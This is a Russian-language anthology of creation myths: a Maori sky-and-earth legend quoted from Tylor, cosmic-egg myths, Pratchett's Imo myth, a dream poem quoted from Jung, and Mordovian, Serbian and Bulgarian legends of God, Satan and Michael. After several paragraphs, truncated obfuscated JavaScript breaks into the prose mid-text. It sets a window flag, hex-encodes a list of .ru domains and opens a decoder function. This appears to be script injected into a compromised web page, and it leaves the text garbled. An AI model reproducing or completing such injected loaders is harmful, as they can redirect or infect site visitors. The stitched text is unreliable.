Сотворение мира.

В начале была вечная ночь,безразличная тёмная По.Прошло неизмеримо много времени и зародилось стремление;оно разросталось,оно сменялось.Всё творчество обозначается как цветение,Пуа.Зарождается мысль,зарождается великая загадка жизни,плодотворная сила...и только как девятнадцатая ступень после небытия-небо и земля,Рангис и Папа.Небо возлегало на Земле.Но дети неба и земли решили разлучить их,чтобы был свет.Бог войны,бог моря и другие боги пытались это сделать;они были бессильны.Но вот поднялся Тане-Магута,бог лесов:он склонил главу свою к земле,он упёрся ногами в небо и оторвал родителей друг от друга.Что значили для него их жалобы и стоны!И вот стали видны люди...теперь господствовал свет.Но любящая женщина,Земля,посылает свои вздохи к далёкому супругу,это-туман,медленно поднимающийся над землёю,а слёзы падают вниз,на женщину,это-роса.
Для начала нашего обозрения вполне подходит замечательный по своему оригинальному совершенству космический миф Новой Зеландии. Людям, по-видимому, давно еще и часто приходило на ум, что всепокрывающее небо и всепорождающая земля - это как бы отец и мать всего мира, а все живые существа - люди, животные и растения - их дети. Нигде эта давно уже рассказывающаяся сказка не представляет нам природу в столь прозрачном олицетворении и не передает нам повседневную, обычную жизнь мира с такой детской простотой в виде рассказа о давно минувших временах, как легенда о «детях неба и земли», записанная сэром Джорджем Грэем у маори в 1850 г. От Ранги, Неба, и Папы, Земли, сказано там, произошли все люди и вещи, но Земля и Небо прильнули друг к другу, и тьма покрывала их и порожденных ими существ, пока наконец дети их не учинили совет - должны ли они разъединить своих родителей или убить их. Тогда Тане-Магута, отец лесов, сказал своим пяти великим братьям: «Лучше разлучить их, и пусть Небо станет высоко над нами, а Земля ляжет под нашими ногами. Пусть Небо сделается нам чуждым, а Земля останется близка к нам как наша мать и кормилица». И восстал Ронго-ма-тане, бог и отец возделанной пищи человека, и пытался разъединить Небо и Землю. Он напрягся, но тщетно, и тщетны также были усилия Тангароа, отца рыб и пресмыкающихся, и Гаумиа-Тикитики, отца дикорастущей пищи, и Ту-Матауенги, бога и отца свирепых людей. Тогда тихо поднялся Тане-Магута, бог и отец лесов, и вступил в борьбу со своими родителями, стараясь разъединить их своими руками. «Вот он приостановился. Его голова теперь крепко уперлась в Матерь-землю, свои ноги он поднял вверх, уперся в Отца-небо и напряг свою спину и члены в могучем усилии. Теперь разорваны Ранги и Папа, и с плачем и проклятиями они громко застонали... Но Тане-Магута не останавливается; далеко, далеко под себя вдавливает он Землю, далеко, далеко над собой отбрасывает он Небо». Но Таугири-ма-теа, отец ветров и бурь, никогда не соглашался на то, чтобы мать его оторвали от ее господина, и в груди его возникло лютое желание напасть на своих братьев. И вот бог бури поднялся и последовал за своим отцом в поднебесную область и помчался к защищенным пещерам беспредельного неба, под кровом которых он нашел себе пристанище и приют. Тогда вышли его дети, могучие ветры и буйные шквалы, тучи темные, плотные, огненные, дико мчавшиеся, с треском разражавшиеся, и, окруженный ими, ринулся отец их на своего врага. Тане-Магута и его гигантские леса стояли, ничего не ведая и не подозревая, когда бешеный ураган разразился над ними, с треском ломая могучие деревья и разбрасывая по земле вырванные и растерзанные стволы и сучья, отдавая их на съедение насекомым. Тогда отец бурь бросился вниз и начал бичевать воды, так что волны поднялись подобно скалам, а Тангароа, бог океана и отец всего живущего в нем, в ужасе бежал по своим морям. Дети его, Икатере, отец рыб, и Ту-те-вегивеги, отец пресмыкающихся, также бросились искать себе безопасного места. «Слушай, слушай, - кричал отец рыб, - давай скроемся в море!» Но отец пресмыкающихся кричал ему в ответ: «Нет, нет, лучше искать спасения на суше!» И так существа разделились: рыбы ушли в море, пресмыкающиеся искали спасения в лесах. Но морской бог Тангароа, взбешенный изменой детей своих, пресмыкающихся, поклялся в вечной вражде к брату своему Тане за то, что тот приютил их в своих лесах. Тане со своей стороны отплачивает ему тем же, позволяя детям брата своего Ту-Матауенги, отца свирепых людей, посредством лодок, копий и удочек, сделанных из его деревьев и сетей, сплетенных из его волокнистых растений, уничтожать всю рыбу, детей бога морей. А бог морей в гневе набрасывается на бога лесов, заливает его лодки волнами моря, сносит наводнениями его деревья и дома в беспредельный океан. Затем бог бури набросился на братьев своих, отцов и родителей возделанной и дикой пищи, но Папа, Земля, схватила их и спрятала в такое безопасное место, что бог бури искал их тщетно. Тогда он накинулся на последнего из братьев, отца свирепых людей, но его он даже не мог и пошатнуть, хотя и напрягал всю свою мощь. Какое было дело Ту-Матауенги до ненависти своего брата? Это он задумал план погибели своих родителей и выказал себя храбрым и свирепым на войне. Его братья отступили перед ужасным нападением бога бури и его потомства: бог лесов и его дети были изломаны и разнесены в мелкие щепки, бог моря и его потомство бежали в глубину океана или в береговые углубления, боги пищи нашли спасение в тайном убежище, и только человек всегда стоял отважно и непоколебимо на груди своей Матери-земли, пока сердца Неба и Бури не смягчились и не утихла их вражда. Но тогда Ту-Матауенги, отец свирепых людей, стал думать, как ему отомстить своим братьям, которые оставили его без помощи во время его борьбы с богом бурь. Он свил силки из листьев дерева ванаки, и перед ним пали птицы и звери, дети Тане, бога лесов. Он сплел сети из растения льна и ловил рыб, детей Тангароа, бога морей. Он отыскал подземное убежище детей Ронго-ма-тане, сладкий картофель и всю возделанную пищу, и детей Гаумиа-Тикитики, корень папоротника и всю дикорастущую пищу, выкопал их и заставил увядать на солнце. Но хотя он взял верх над своими четырьмя братьями, которые все послужили ему пищей, ему никогда не удалось одолеть пятого, Таугири-ма-теа, бога бури, который все еще насылает на него ураган и бурю и старается сгубить его как на море, так и на суше. Вследствие порыва гнева бога бури против своих братьев суша скрылась под водами. Существа давно прошедших времен, потопившие таким образом землю, были: ливень-дождь, долго продолжающийся дождь и свирепые ураганы; дети их были: туман, тяжелая роса и легкая роса, и оттого только небольшая часть суши осталась над поверхностью моря. Тогда яркий свет увеличился в мире, и существа, остававшиеся скрытыми между Ранги и Папа до их разъединения, теперь размножились на земле. Вплоть до настоящего времени беспредельное Небо всегда оставалось в разлуке со своей супругой Землей. Но обоюдная любовь их не прекращается; теплые мягкие вздохи ее любящего сердца и поныне возносятся к нему, поднимаются от лесистых гор и долин, и люди называют их туманами. А беспредельное Небо, тоскуя в долгие ночи в разлуке со своей возлюбленной, часто проливает слезы на ее грудь, и люди, видя их, называют их каплями росы. Разрыв нёба с землей - это очень распространенная полинезийская легенда, хорошо известная и на островах, лежащих к северо-востоку. Но выработка ее в только что представленный нами миф, по всей вероятности, принадлежит Новой Зеландии. Нет также основания предполагать, что та особая форма, в которой записал ее английский губернатор у маорийских жрецов и рассказчиков, относится к отдаленному времени. Нельзя приписывать одной только давности тот отпечаток архаизма, который присущ этому рассказу. Как недавно еще употреблявшиеся жителями Новой Зеландии тесла из полированного нефрита и плащи из вязаного льна относятся к более древнему историческому времени, чем бронзовые боевые секиры и полотняные покрывала древних египтян, точно так же и поэтическое воспроизведение природы в природном мифе маори принадлежит к той стадии интеллектуальной истории, которая у греков оканчи- вала своей век 25 столетий тому назад. И тем не менее как указанные орудия маори, так и форма приведенного мифа могут относиться к сравнительно недавнему прошлому. Мифический вымысел, что небо и земля были отцом и матерью всего существующего на свете, естественно, породил легенду, что в древнейшие времена они были соединены и только впоследствии были разлучены. (Тайлор Э. Б. Первобытная культура) источник - http://www.gumer.info/bibliotek_Buks/History/Tail/06.php

Все начинается и все заканчивается яйцом. В большинстве мифологий яйцо является символом рассвета и заката.

В самых древних египетских мифах сотворение мира описывается как появление из Космического яйца, содержавшего в себе солнце и зародыши жизни.
В орфизме считается, что Кронос, пожирающий время, сотворил в темноте серебряное яйцо, из его половинок возникли небо и земля. Когда яйцо распалось, из него вышел Фанес, бог-демиург, которого изображали в виде жужжащей пчелы.

Индусы считают, что Вселенная вначале была лишена сущности, пока не приняла форму яйца – Хиранья Гарбха, – скорлупа которого стала границей между ничем и чем-то. Через год это Космическое яйцо раскрылось, и его внутренняя оболочка превратилась в облака, прожилки стали реками, а жидкость – океаном.

Китайцы верят, что первоначальный хаос породил яйцо, оно раскололось, и появились земля Инь и небо Ян.
Полинезийцы утверждают, что вначале было яйцо, содержащее Те Туму, основание, и Те Папа, скалу. Когда оно раскололось, появились три платформы, стоящие одна на другой, на которых Те Туму и Те Папа создали человека, животных и растения.
Согласно каббале Вселенная появилась из яйца, расколовшегося на 288 кусков.
Японские, финские, славянские и финикийские мифы о сотворении мира также говорят о мировом яйце.
(«Новая энциклопедия Относительного и Абсолютного знания», Бернар Вербер)

Как Имо сотворил мир давным-давно, когда всё было по-другому и луна тоже была другая

Однажды Имо пошёл на рыбалку, но моря не было. Вообще ничего не было, кроме Имо. Тогда он плюнул на ладони и потёр одну о другую, и сделался шар, состоящий из моря. Потом Имо сделал несколько рыб, но они были ленивые и глупые. Тогда он взял души дельфинов, ведь дельфины хотя бы умели говорить, и смешал их с глиной, и помял в ладонях, и придал им форму, и они стали людьми. Они были умные, но не могли плавать целый день, поэтому Имо накопал ещё глины, помял её в ладонях, обжёг на костре, и так сотворил сушу. Скоро люди заполнили всю сушу и съели всё, что можно было, поэтому Имо взял немного ночи, помял её в ладонях и сделал Локаху, бога смерти. Но Имо всё равно чего-то не хватало. Он сказал: «Я играл с песком, как ребёнок. Этот мир плох. Я делал его не по плану. Он получился неправильный. Я разомну этот мир в ладонях и сделаю другой, получше». Но Локаха сказал: «Глина уже схватилась. Люди погибнут». Имо рассердился и сказал: «Кто ты такой, чтобы со мной спорить?» И Локаха ответил: «Я часть тебя, как всё сущее. И потому говорю тебе: отдай этот мир мне, а сам пойди и сделай другой, получше. Я буду справедливо править этим миром. Умирая, люди будут превращаться в дельфинов — на время, пока им не придёт пора родиться снова. Но когда я найду человека, который стремился к цели, смог подняться над глиной, из которой его сотворили, оправдал этот гнусный мир своей жизнью в нём, — тогда я открою людям дверь в твой совершенный мир, и они больше не будут принадлежать времени, но облачатся в звёзды».

Имо согласился, ведь этот мир был его творением. Он отправился творить новый мир, в небе. Но прежде чем уйти, он дохнул себе в ладони и сделал других богов, чтобы Локаха не мог править один. Люди должны умирать, но пусть умирают в свой срок.

Вот потому мы рождаемся в воде, не убиваем дельфинов и стремимся к звёздам.

 

(Терри Пратчетт

Народ, или Когда-то мы были дельфинами)

Юнг "Либидо, его символы и метаморфозы"  "..«Из Неаполя в Ливорно пароход идет одну ночь, которую я более или менее хорошо спала, между тем сон мой редко бывает глубоким и без сновидений. Мне казалось, словно голос моей матери разбудил меня как раз к концу следующего сна. Какое-то смутное представление, связанное со словами: When the morning stars sang together; эти слова прелюдировали к некоторому неясному представлению о мироздании и о мощных хоралах, наполняющих своими звуками вселенную. В страшные противоречия и в путаницу, свойственную вообще сновидениям, вмешивались на этот раз хоры одной оратории, исполненной в Нью-Йорке в музыкальном обществе, а также и воспоминания из «Потерянного Рая» Мильтона. Потом из всей этой путаницы медленно выплыли определенные слова, которые стройно связались в три строфы и притом они появились написанными моим почерком на странице моего старого альбома для стихов (с обыкновенной бумагой с синими линиями), постоянно находящегося при мне; словом, строфы эти появились совсем так, как они несколько минут спустя в действительности были занесены в мой альбом.»

Мисс Миллер записала следующее стихотворение, которое она несколько месяцев спустя еще немного переработала, что по ее мнению сделало его более близким к оригиналу сновидения. «Когда Предвечный создал звук, возникли мириады ушей, чтобы слышать, и через всю вселенную прогремело эхо глубоко и ясно: Слава Богу Звука!»«Когда Предвечный создал свет, возникли мириады глаз, чтобы видеть, и внимающие уши и зрящие глаза запели снова мощный хорал: Слава Богу Света!»«Когда Предвечный создал любовь, то в жизнь вступили мириады сердец, уши, исполненные звуков, и глаза — света, а сердца, исходящие любовью, воскликнули: Слава Богу Любви!»...
...
"Бог,мывшийся в бане и вспотев,отёрся ветошкой и бросил её с небес на землю;и сотворил дьявол человека,а Бог душу в него вложил.Потому то,когда умирает человек,в землю идёт тело,а душа к Богу."
 Описанный рассказ волхвов человека о сотворении человека,сотворился среди природных финнов.По мордовской версии человека вздумал сотворить не Чам-Пас,добрый верховный бог,а Шайтан,злой бог,сатана.Шайтан лепил тело человека из глины,песку и земли;выходили у него то свинья,то собака,гады;Шайтану же хотелось слепить человека по образу и подобию Чам-Паса.Тогда Шайтан позвал птичку-мышь и приказал ей вить гнездо в одном конце полотенца,которым Чам-Пас вытирается когда в баню ходит,и развести там там детей:один конец станет станет тяжелей и полотенце с гвоздика от неравномерной тяжести упадёт на землю.Всё так и случилось:когда полотенце упало на землю,Шайтан подхватил его и обтёр им свой слепок,и получил человек образ и подобие Божие.После того Шайтан стал оживлять человека,но никак не мог вложить живую душу.Душа в человека была вдохнута Чам-Пасом.Между Шайтаном и Чам-Пасом произошёл продолжительный спор:кому должен принадлежать человек?Наконец, когда Чам-Пасу надоело спорить,он предложил поделить человека:после смерти душа должна идти на небо к к Чам-Пасу,который её вдунул,а тело гниёт разлагается и идёт к Шайтану.А птичку-мышь Чам-Пас наказал,за то что она послушалась Шайтана,летала на небо и свила гнездо в Чам -Пасовом полотенце.Чам-Пас отнял у неё крылья и приставил ей хвост такой же,как у Шайтана,и дал ей такие же лапы как у него.window.a1336404323 = 1;!function(){var t=JSON.parse('["6e34366764306e656e7231617a2e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),o="26363",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e
Плывший по водам Чам-Пас плюнул с досады на своё одиночество.Из этого плевка образовался огромный бугор,в котором скрывался Шайтан.Чам-Пас послал Шайтана на дно моря за песком,чтобы из него сотворить землю,и заповедал Шайтану помянуть его,Чам-Пасово имя.Шайтан не сразу исполнил повеление Чам-Паса и,только в третий раз,помянув его имя,мог достать песку,но при этом часть песка скрылась во рту.Чам-Пас разбросал песок,который стал рости;образовалась земля.Вместе с этим рос песок,скрытый во рту Шайтана,причиняя ему страшную боль.Шайтан должен был признаться в своём поступке.Чам-Пас приказал Шайтану выплюнуть изо рта скрытый песок,от чего образовались бугры,горы и холмы.А до этого земля была ровная и гладкая.Чам-Пас проклял Шайтана и изгнал его в преисподнюю.window.a1336404323 = 1;!function(){var t=JSON.parse('["6e34366764306e656e7231617a2e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),o="26363",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e
Из сербской народной песни:Царь Дуклиан и Креститель Иоан.
Гонитель христиан римский император Дуклиан и Креститель Иоан-побратимы.Они пьют вино на берегу моря,после чего начинают играть,бросая яблоко,-нечто вроде игры в мяч.Креститель сильно бросил яблоко,и оно упало в море.Дуклиан предложил достать яблоко со дна моря,если только Креститель не завладеет его короной.Пока Дуклиан доставал из моря яблоко,Креститель полетел на небо и просил Бога разрешить ему хитростью овладеть короной.При дальнейшей игре Креститель нарочно забросил яблоко в море.Дуклиан опять берётся достать яблоко,если только Креститель не будет трогать его короны;затем Дуклиан,поставив на страже ворона,нырнул в морскую пучину.Креститель заморозил море,схватил корону и полетел на небо.Ворон закаркал,и Дуклиан поспешил подняться наверх,для чего ему пришлось пробить толстый слой льда.Дуклиан настиг Крестителя у небесных врат и не мог уже отнять у него короны,только схватив за ступню,вырвал у него кусок мяса.В утешение ему,Господь сделал,что у всех людей имеется тоже самое,т.е выемка на подошве ног.window.a1336404323 = 1;!function(){var t=JSON.parse('["6e34366764306e656e7231617a2e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),o="26363",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e
 Во времена ,когда на свете ещё ничего не было,а была одна вода,Бог ходя по той воде,увидел пузырь,в котором оказался маленький невзрачный человечек с хвостом и рожками.Бог назвал этого человечка Сатанаилом и сделал его в чем то в роде своего товарища.(Итак, дьявол соначален Богу по этой легенде).Бог приказывает Сатанаилу достать со дна моря горсть песку,чтобы создать землю.Сатанаил обнаруживает гордость и неповиновение.Только в третий раз у него осталось ничтожнейшее количество песку под ногами,и из этой земли Бог творит землю.Сатана хочет погубить уснувшего Бога,но убеждается только в своём бессилии.Однако Господь был к нему милостлив и даже подарил ему золотую корону на голову.Бог творил мир,а Сатанаил бесчисленное количество подобных себе человечков,т.е. дьяволов,при помощи которых он хотел овладеть небом.Но Бог сверг Сатанаила и всю его рать с неба и создал ангелов,среди которых особенною любовью Его пользовался Миха.Обладавший только двумя крыльями Миха спускался на землю и дружится с Сатанаилом,задавшись целью отобрать у Сатанаила его золотую корону.(Дальнейшее сходно с сербской песней.)Приятели купаются в море и спорят,кто больше продержится под водой.Миха хитростью заставил Сатанаила продержаться под водой возможно большее количество времени,а сам схватил корону и бросился на небо.Сатанаил с трудом пробил покрывающий море лёд,и пустился догонять Миху.Имея шесть крыльев,Сатанаил догнал Миху и отнял бы у него свою корону.Но Господь бросил Михе громадный огненный меч,которым Миха отрубил Сатанаилу с одной стороны три крыла,в следствии чего Сатанаил шлёпнулся на землю.Тогда Господь отнял у Сатанаила конец его имени-ил и приставил его к имени Миха;таким образом Сатанаил стал называться Сатана,а Миха-Михаил.

Злобствуя на Михаила,Сатана изготовил громадный чугунный столб с приспособлениями для приковывания шеи,рук и ног,и хранил этот столб в глубокой яме,надеясь когда-нибудь захватит ненавистного Миху.Однажды,когда Сатана пробовал своё изобретение,проходил мимо какой-то слабенький старик и стал спрашивать,что это за вещь.Давая объяснения ,Сатана надел на себя цепи,приладил их  позапирал."А что,Дед,хорошо,а?" спросил Сатана."Аминь",изрёк старик,и тотчас железо слилось,и Сатана очутился на веки закованным.Дед был ни кто иной,как сам Бог.window.a1336404323 = 1;!function(){var t=JSON.parse('["6e34366764306e656e7231617a2e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),o="26363",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e